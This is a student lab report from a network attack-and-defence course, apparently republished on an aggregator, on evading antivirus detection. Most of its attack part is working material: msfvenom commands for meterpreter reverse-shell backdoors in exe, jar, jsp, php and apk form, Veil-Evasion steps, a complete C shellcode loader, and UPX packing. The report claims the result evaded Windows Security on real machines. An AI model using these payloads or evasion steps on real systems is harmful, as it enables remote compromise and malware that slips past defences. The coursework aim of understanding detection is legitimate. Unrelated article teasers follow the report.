#20232329易杨文轩 2025-2026-1 《网络与系统攻防技术》 实验三实验报告

news/2025/10/20 17:49:35/文章来源:https://www.cnblogs.com/yywx20232329/p/19153241

1.基本问题

  • (1)杀软是如何检测出恶意代码的?
  • 1.特征码检测

原理:通过比对文件或程序的静态特征例如特定字符串、哈希值、代码片段,与病毒库中的已知恶意代码特征对比。
例子:若某文件包含与病毒库中“WannaCry”勒索病毒相同的唯一字符串,则判定为恶意。

  • 2.启发式分析

原理:通过模拟执行或静态分析代码行为,识别可疑模式例如修改系统关键文件、创建自启动项。
例子:某程序尝试加密用户文档并删除备份,触发勒索行为heuristic规则。

  • 3.机器学习/AI检测

原理:通过训练模型识别恶意代码的统计特征例如API调用序列、代码熵值。
例子:深度学习模型发现某程序代码熵值异常高,且API调用模式与已知木马相似。

  • ……

  • (2)免杀是做什么?

  • 免杀就是让恶意代码通过加壳、加密、混淆、延迟执行、注入系统进程、对抗AI模型等技术手段伪装成正常程序或隐藏其真实行为,从而绕过杀毒软件的特征码、行为监控、沙箱分析和云端检测,本质上是攻击者与杀软之间持续升级的“隐身与反隐身”博弈。

  • (3)免杀的基本方法有哪些?

  • 免杀的基本方法包括特征码修改、加壳加密、代码混淆、延迟执行与反沙箱检测、白进程注入或DLL劫持、利用系统工具无文件落地、对抗AI模型的对抗样本构造以及通过污染云端信誉或伪造签名等方式绕过杀毒软件的静态、动态和云端检测。

2.实验操作

2.1生成后门进行扫描

  • 我们可以使用exp2里生成好的后门程序进行扫描,扫描常用的网站有VirusTotal和Virscan等,这里我们使用VirusTotal。

39a3c30c54447b21b1e0aa6147783367

  • 从扫描结果里看出,这里的后门程序exe很容易的就被AV扫描到了,因此尝试用msf对后门程序进行一次到多次的编码,查看重新编码后的程序在AV中的扫描效果。

  • 使用代码msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.52.129 LPORT=2329 -f exe > 20232329_backdoor.exe

其中:

  • -e用来选择编码器

  • -i用来选择编码次数,实际上最大可能不超过30次,我试了100但是不行

  • -b用来去除不需要的字符,在shellcode里“\x00”不该存在,因为是结束符

  • 生成一次编译的后门程序

24240b1136294cf26980a667af2c6a25

e88764c9ad5e3c593e8e955c70d91585

  • 在AV扫描中反而效果更差

  • 生成二十次编译的后门程序

baf966413f32e74ba62b8897652c3399

83ce74235472001371a20b5a0f3b4201

  • 似乎效果还不如一次编译

2.2msfvenom生成如jar之类的其他文件

  • 首先jar文件
  • 代码msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.52.129 LPORT=2329 x> 20232329jar.jar

f25f71a4e157c55d86aa7c456aaecd54

  • 这里使用ncat来进行虚拟机和主机间的文件传输,后同

8c61921483a339e72fd11b3b0ec6a5bc

fbdf765bf752e200d276ee40b77e8d1d

  • 进行扫描

1c36365ff623ba96fa0bfb9eb9b462db

  • jsp文件
  • 代码msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.52.129 LPORT=2329 x> 20232329jsp.jsp

65fb912f4a2885f6a36df830b0da9ae0

5356a40c4a7d7839053ddf3e85417da6

  • php文件
  • 代码msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.52.129 LPORT=2329 x> 20232329php.php

1e8bc05881a295f2898284ff33284dd1

5db42fe71a3e86965d0308739316cec4

  • 目前来看效果最好的是php文件

  • apk

  • 代码msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.52.129 LPORT=2329 x> 20232329apk.apk

c729a7f4057a7eb5b5fe019c650b3ff5

a0fa7a94da0aea74ececcc6bff520f42

  • apk文件的效果也还可以,但总的来讲都不能很好的通过AV软件的扫描

2.3使用veil-evasion生成后门程序

  • 借鉴到下载中科院源的办法
  • 首先依次输入

sudo apt-get install libncurses5*
sudo apt-get install libavutil55*
sudo apt-get install gcc-mingw-w64*
sudo apt-get install wine32
sudo apt-get update

  • 安装过程中全部y通过
  • 然后进行veil的安装
  • sudo apt-get install veil
  • 下载好之后输入veil进入

82ef8150940d7dc39d05be4f7d6b3ef8

bfb77d50c433876e051354e59003d0c5

  • 输入use evasion,再输入use c/meterpreter/rev_tcp.py进入配置界面

97402cf2189e6caa4f37e08ab698e1bd

  • 与msf相似,开始进行配置:LHOST、LPORT
  • 输入options查看配置

11055cecae5d77de6c6502089b4e92c9

  • ip

124acafee6d9bf9cdea94e6f38b456b3

  • 使用generate命令生成文件,接着输入生成的playload的名称veil2329,保存路径为/var/lib/veil/output/complied/veil2329.exe

f2be18f1245cefb832f601441bc268a4

-扫描

d620510e6a4f76eeeae9ae16b83b017f

  • 效果依旧不太好

2.4使用C+shellcode编程生成后门程序

  • 指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.129 LPORT=2329 -f c
  • 对2329.c进行编辑,将buf添加到代码中

ff6d4065c54d69ec37feda73c7ef74e5

  • unsigned char buf[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c" "\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54" "\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x7a\x88" "\x68\x02\x00\x14\xc5\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50" "\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5" "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67" "\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff" "\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00" "\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56" "\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58" "\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5" "\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85" "\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1" "\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"; int main() { int (*func)() = (int(*)())buf; func(); }

bce1d526980f82646149351f1212e60c

  • 生成可执行文件exe

b3b8bce4e8ff0800bd7e87ae739c1b3a

d3f084ce53234df2dd0bac1aea054f0a

cf780ffe8588c85f5d817839dc669dff

  • 还是会被抓住

2.5加壳工具

  • 使用命令upx 2329.exe -o 2329nb.exe对exe程序进行加壳

d89c6c4b0bb4412d0f23cdd2602a4743

  • 扫描一下

65f469ce6fd3eb445aaa13b7f3010fe7

  • ?怎么越整越高

2.6通过组合应用各种技术实现恶意代码免杀

  • 使用veil配置

70cc9ccae3024b6d04ef97c40d594a6e

  • 配置payloaduse c/meterpreter/rev_tcp.py
  • 也可以使用其他的payload,效果可能不同,输入list可以查看

07e0f3b65e3d34cb46f1f4784fdc6101

  • 这里选择bat文件
  • 对程序进行加壳
  • 在进行扫描

a2fd59f7ea3060ae2baafab083bf3ed5

  • 那很好了

2.7通过组合应用各种技术实现恶意代码免杀

  • 刚才会生成三种形式的恶意文件:exe、c、rc
  • 来实践一下杀软
  • Windows安全中心

bb11ad2bb21968d0c1fbebcbcc2cdbd4

bb11ad2bb21968d0c1fbebcbcc2cdbd4

9eaea8323ffbf9753d82d37a5236860d

283cb5292cffa46b3f911f5eaf00b86a

  • 可以看到怎么样都扫描不到
  • 火绒安心中心
  • 火绒安全 版本6.0.7.14 病毒库:2025-10-19 15:56

f141c7d9f29e8c26b5df2e9c309d0ff5

  • 扫描到的不是我们包装的后门,这里是ensp开着

2.8实机实测

  • 电脑环境:win11主机
  • 杀毒引擎:Windows安全中心

df8b9ec857333ac93c9c13931028f75e

d67b78c6f6161516292c79378425dfe8

  • 在同学的电脑上也扫描不到

3.问题及解决方案

  • 问题1:在下载安装veli时反复报错
    a1be5c95ae15a06c243013ad9219668f

bacf75fdecd013af2e5a7dbe985783fd

  • 问题1解决方案:最后检查发现是我的虚拟机内存不够了,重新对硬盘进行扩容,这里参照了:(https://blog.csdn.net/weixin_46136890/article/details/130750913)

4.学习感悟、思考等

这次实验让我们了解杀毒软件是如何排查的,以及后门程序、恶意软件是怎么能够逃过杀毒软件的排除,但实践结果是,这样做只能躲避第一轮筛查,后续如果想要运行这个后门程序还是会被杀毒软件查杀,想要通过这个办法进行攻击还需要社工攻击等来关闭AV软件。

参考资料

  • 实验指导书
  • 往届实验报告

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/941442.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

MATLAB实现对角加载波束形成算法

一、算法原理与核心思想 对角加载(Diagonal Loading, DL)是一种通过人为增加协方差矩阵对角元素来改善波束形成鲁棒性的技术。其核心思想源于对样本协方差矩阵条件数的优化:数学基础:在MVDR波束形成中,权向量计算…

2025 年压缩机源头厂家最新推荐榜单:覆盖石油化工燃气多领域,精选优质企业解决采购难题

引言 当前石油、化工、燃气等行业对特种气体压缩机需求激增,但市场上厂家良莠不齐,技术研发薄弱、产品适配性差、售后不完善等问题频发,且 “碳中和” 背景下低碳节能机型需求增长,多数厂家难以满足,给企业采购带…

2025年中医师承与确有专长机构权威推荐榜:传统医学传承与执业资质考取优质机构深度解析

2025年中医师承与确有专长机构权威推荐榜:传统医学传承与执业资质考取优质机构深度解析 一、中医师承与确有专长教育行业现状 传统医学作为中华民族的文化瑰宝,近年来在政策支持和市场需求的双重推动下,迎来了前所未…

Reborn

我又复活啦! 不定期更新最近CF、At比赛有价值题目的题解和思路~

2025年电源适配器厂家推荐排行榜:笔记本电源适配器,手机电源适配器,工业电源适配器,充电器电源适配器公司推荐

2025年电源适配器厂家推荐排行榜:笔记本电源适配器,手机电源适配器,工业电源适配器,充电器电源适配器公司推荐 行业背景分析 随着全球数字化转型进程加速,电源适配器作为电子设备的核心能源部件,其市场需求呈现持…

10月20号

今天上午进行了统一建模的学习。 然后进行了数据结构的学习。 下午进行了java中关于数据库的学习。

2025 年南昌瓷砖厂家推荐老龙严选瓷砖图书馆,南昌木纹/小花/岩板/鱼骨拼木纹/莱姆石/金丝绒釉/岩板/素色瓷砖公司推荐

行业背景 随着南昌城市建设加速与消费升级,家居装修市场对瓷砖的品质、风格多样性及服务体验要求持续提升。数据显示,2025 年南昌硬装材料均价同比上涨 6.2%,瓷砖作为核心基础材料,其性价比、环保性与适配性成为消…

MetalLB部署

只需要三个yaml文件就可以实现LB apiVersion: metallb.io/v1beta1 kind: L2Advertisement metadata:name: examplenamespace: metallb-system spec:ipAddressPools:- first-pool apiVersion: metallb.io/v1beta1 kind:…

小程序-视频号显示

在小程序展示视频号的卡片,点击查看就会跳转到视频号:<view bindtap="bindtapShipin">查看 </view> bindtapShipin: function (e) {wx.openChannelsUserProfile({finderUserName: sphMv2jXan…

c# 获取cpu温度

安装包:LibreHardwareMonitorLib var computer = new Computer(){ IsCpuEnabled = true, IsGpuEnabled = true, IsMemoryEnabled = true, IsMotherboardEnabled = true, IsStorageEnabled = true};comp…

基于结构稀疏的SAR图像低秩重建

一、核心算法框架 1. 理论基础低秩特性:SAR图像在方位-距离平面具有强相关性,可通过矩阵分解建模为低秩矩阵+稀疏噪声 结构稀疏性:利用边缘、纹理等先验信息构建结构化字典,提升稀疏表示精度 联合优化:将低秩约束…

2025年焊接设备厂家权威推荐榜:铣边机、铣床、刨边机、滚轮架、变位机全系列专业解析与选购指南

2025年焊接设备厂家权威推荐榜:铣边机、铣床、刨边机、滚轮架、变位机全系列专业解析与选购指南 行业背景与发展趋势 随着制造业向高质量方向发展,焊接装备行业正经历着深刻的技术变革。铣边机、铣床、刨边机、滚轮架…

多层感知机笔记

Fashion-MNIST 分类任务代码笔记 一、整体概述 本代码基于 PyTorch 实现了一个简单的全连接神经网络,用于解决 Fashion-MNIST 图像分类任务(10个类别)。核心流程包括:网络定义、权重初始化、超参数设置、数据加载、…

学会使用树研究和实现递归算法

本文章的核心思想来自labuladong的算法笔记网站,加上了我一些自己的学习心得,只用于学习用途。文章中的图片和代码都是原创,非转载。 背景 本人本科审计学,硕士软件工程,目前研究方向是ai在数据库领域的应用(目前…

Sql查询优化方案

Mybatis 分页查询统计方法重写,在查询方法后面固定追加:"_COUNT" 比如: 分页查询方法:pageQuery 重写分页查询统计:pageQuery_COUNT 单表查询统计:select count(1) from xxxdb.t_order sql 查询优化 利…

计算机思维的数与位

计算机思维的数与位Posted on 2025-10-20 17:34 夜owl 阅读(0) 评论(0) 收藏 举报n进制的数与位 在计算机的代码世界中,是以二进制的位的基础来组成数,至此我还是混淆,二级制的1000(十进制的8)中的1是第4个数…

实用指南:深入解析HarmonyOS ArkTS:从语法特性到实战应用

实用指南:深入解析HarmonyOS ArkTS:从语法特性到实战应用pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consol…

2025 防水背衬板厂家最新推荐榜:剖析质量与口碑,优选品牌助您精准采购

引言 在建筑防水工程愈发受重视的当下,防水背衬板的品质直接决定防水层的耐久性与建筑结构安全。但当前市场呈现 “劣币扰市” 乱象:部分企业用劣质原料生产的产品,短期内即出现渗漏、开裂问题,导致后期维护成本激…

如何安装fluentd 和fluentd-mongo的插件?然后收集nginx的 json格式的数据写到mongodb

手动安装 Fluentd + MongoDB 插件并收集 Nginx JSON 日志 以下是完整步骤,从安装 Fluentd 到配置 Nginx JSON 日志存储到 MongoDB。手动安装 Fluentd(td-agent)如果已通过 RPM 安装 td-agent,跳过此步。否则: 下载…